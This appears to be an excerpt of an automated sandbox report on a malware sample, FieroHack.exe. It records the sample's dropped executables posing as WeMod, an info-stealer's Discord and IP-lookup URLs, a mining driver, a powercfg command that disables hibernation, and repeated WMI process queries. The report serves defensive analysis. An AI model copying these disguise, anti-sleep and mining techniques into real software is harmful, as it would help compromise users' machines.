      Source: Sirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
      Source: Sirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
      Source: Sirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
      Source: Sirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
      Source: Sirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
      Source: Sirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
      Source: Sirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
      Source: Sirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
      Source: Sirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
      Source: Sirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
      Source: Sirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
      Source: Sirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
      Source: Sirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
      Source: Sirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
      Source: Sirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
      Source: Sirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
      Source: Sirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
      Source: Sirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
      Source: Sirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
      Source: Sirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
      Source: Sirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
      Source: Sirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
      Source: Sirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
      Source: Sirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
      Source: Sirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
      Source: Sirus.exe, 00000007.00000002.1976423267.0000000002864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.s
      Source: Sirus.exe, 00000007.00000002.1976423267.0000000002864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/ip
      Source: Sirus.exe, 00000007.00000002.1976423267.00000000028F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
      Source: svchost.exe, 00000023.00000003.1960939694.0000020AFD082000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.35.dr, edb.log.35.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
      Source: edb.log.35.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
      Source: edb.log.35.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
      Source: edb.log.35.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
      Source: svchost.exe, 00000023.00000003.1960939694.0000020AFD082000.00000004.00000800.00020000.00000000.sdmp, edb.log.35.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
      Source: svchost.exe, 00000023.00000003.1960939694.0000020AFD082000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.35.dr, edb.log.35.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
      Source: edb.log.35.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
      Source: WeMod.exe.0.dr, leirdnhqqedj.exe.2.drString found in binary or memory: https://sectigo.com/CPS0
      Source: C:\Users\user\Desktop\FieroHack.exeCode function: 0_2_0040535C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040535C
      Source: Sirus.exe, 00000007.00000002.1976423267.0000000002A14000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_ff4f0cc2-1

      System Summary

      barindex
      Drops large PE files
      Source: C:\Users\user\Desktop\FieroHack.exeFile dump: WeMod.exe.0.dr 718354208Jump to dropped file
      Source: C:\Users\user\AppData\Roaming\WeMod.exeFile dump: leirdnhqqedj.exe.2.dr 718354208Jump to dropped file
      Uses powercfg.exe to modify the power settings
      Source: C:\Users\user\AppData\Roaming\WeMod.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_025B21C0 NtQueryInformationProcess,7_2_025B21C0
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_025B21B8 NtQueryInformationProcess,7_2_025B21B8
      Source: C:\Windows\System32\conhost.exeCode function: 67_2_0000000140001394 NtClose,67_2_0000000140001394
      Source: C:\Users\user\Desktop\FieroHack.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeFile created: C:\Windows\TEMP\qkrjwvgkutvb.sys
      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Roaming\Obsidium\
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Roaming\Obsidium\{3D20819C-5D02B5C8-D5AE7FCB-C4F5C439}
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Roaming\Obsidium\{3D20819C-5D02B5C8-D5AE7FCB-C4F5C439}\6796.obs
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_xau403wb.ddt.ps1
      Source: C:\Users\user\Desktop\FieroHack.exeCode function: 0_2_004069450_2_00406945
      Source: C:\Users\user\Desktop\FieroHack.exeCode function: 0_2_0040711C0_2_0040711C
      Source: C:\Users\user\AppData\Roaming\WeMod.exeCode function: 2_2_0000021E477C357A2_2_0000021E477C357A
      Source: C:\Users\user\AppData\Roaming\WeMod.exeCode function: 2_2_0000021E477C052A2_2_0000021E477C052A
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_025B63807_2_025B6380
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_025B60C07_2_025B60C0
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_025B0A687_2_025B0A68
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_025B74C07_2_025B74C0
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_025B9A707_2_025B9A70
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_025B7AD07_2_025B7AD0
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_025B7EB87_2_025B7EB8
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_025B637F7_2_025B637F
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_025BA7987_2_025BA798
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_025BA7A87_2_025BA7A8
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_025B0A597_2_025B0A59
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_025B8F087_2_025B8F08
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_025B93907_2_025B9390
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_025B938C7_2_025B938C
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_025B97087_2_025B9708
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_025B97077_2_025B9707
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_025B9A5F7_2_025B9A5F
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_025B7AC07_2_025B7AC0
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_025B7EB47_2_025B7EB4
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_0539D8587_2_0539D858
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_053941047_2_05394104
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_0539CFD07_2_0539CFD0
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_05396B707_2_05396B70
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_05396B617_2_05396B61
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_05BF18C07_2_05BF18C0
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_05BF1D307_2_05BF1D30
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_05BF1D207_2_05BF1D20
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_05BF18B17_2_05BF18B1
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_05E1BF907_2_05E1BF90
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_05E17A307_2_05E17A30
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_05E18B387_2_05E18B38
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_05E16A497_2_05E16A49
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_05E17A507_2_05E17A50
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_076D89C07_2_076D89C0
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_076D80F87_2_076D80F8
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeCode function: 43_2_00000238BC7E050A43_2_00000238BC7E050A
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeCode function: 43_2_00000238BC7E355A43_2_00000238BC7E355A
      Source: C:\Windows\System32\conhost.exeCode function: 67_2_000000014000315067_2_0000000140003150
      Source: C:\Windows\System32\conhost.exeCode function: 67_2_00000001400026E067_2_00000001400026E0
      Source: Joe Sandbox ViewDropped File: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe D31478DA75850F66BA9FFB48AAD05BA6EC4E93B2534EA8BA230376F5D553579C
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\WeMod.exe D31478DA75850F66BA9FFB48AAD05BA6EC4E93B2534EA8BA230376F5D553579C
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess token adjusted: SecurityJump to behavior
      Source: FieroHack.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: qkrjwvgkutvb.sys.43.drBinary string: \Device\WinRing0_1_2_0
      Source: classification engineClassification label: mal100.spyw.evad.mine.winEXE@98/19@1/2
      Source: C:\Users\user\Desktop\FieroHack.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348
      Source: C:\Users\user\Desktop\FieroHack.exeCode function: 0_2_0040460D GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_0040460D
      Source: C:\Users\user\Desktop\FieroHack.exeCode function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,0_2_0040216B
      Source: C:\Users\user\Desktop\FieroHack.exeFile created: C:\Users\user\AppData\Roaming\WeMod.exeJump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2080:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5040:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4208:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5960:120:WilError_03
      Source: C:\Users\user\AppData\Roaming\WeMod.exeMutant created: \Sessions\1\BaseNamedObjects\{5A846C8F-25997F09-44655D73-43ADF90D}
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2648:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:916:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5480:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5800:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2132:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6208:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3616:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3196:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5744:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5460:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3668:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2024:120:WilError_03
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeMutant created: \BaseNamedObjects\{A28E6C8F-DD8E7F09-3C6F5D73-8BB7F90D}
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4476:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6232:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3668:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5300:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1312:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5640:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6872:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7112:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2652:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3848:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2488:120:WilError_03
      Source: C:\Users\user\Desktop\FieroHack.exeFile created: C:\Users\user\AppData\Local\Temp\nsiD38E.tmpJump to behavior
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeProcess created: C:\Windows\explorer.exe
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeProcess created: C:\Windows\explorer.exe
      Source: FieroHack.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
